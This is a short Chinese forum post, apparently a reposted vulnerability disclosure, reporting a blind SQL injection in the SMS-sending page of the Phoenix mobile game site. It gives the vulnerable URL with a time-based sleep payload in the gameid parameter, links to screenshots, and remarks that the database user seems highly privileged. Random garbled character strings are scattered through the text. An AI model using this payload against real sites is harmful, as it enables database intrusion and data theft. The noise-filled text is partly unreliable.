简要描述:
1 H6 t8 q& r; N$ @8 o' N* }4 O凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。! C& h, ^& J4 e+ ?, G
0 g9 t. c) L/ i详细说明:" n' I$ l( ]6 a: A6 q; ^
存在SQL盲注url:
9 Y, p0 B' C- m0 _- Gfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=17 ]# [# C9 d8 U; ~
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png8 J/ W( s- U7 A2 g" F n: y
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png/ l/ X; K/ ]8 `7 a! D5 A% q- L! ?
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
6 @) z3 m, ~1 K8 ?- M2 X8 z l4 h
/ W1 a$ _! t4 C5 T能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对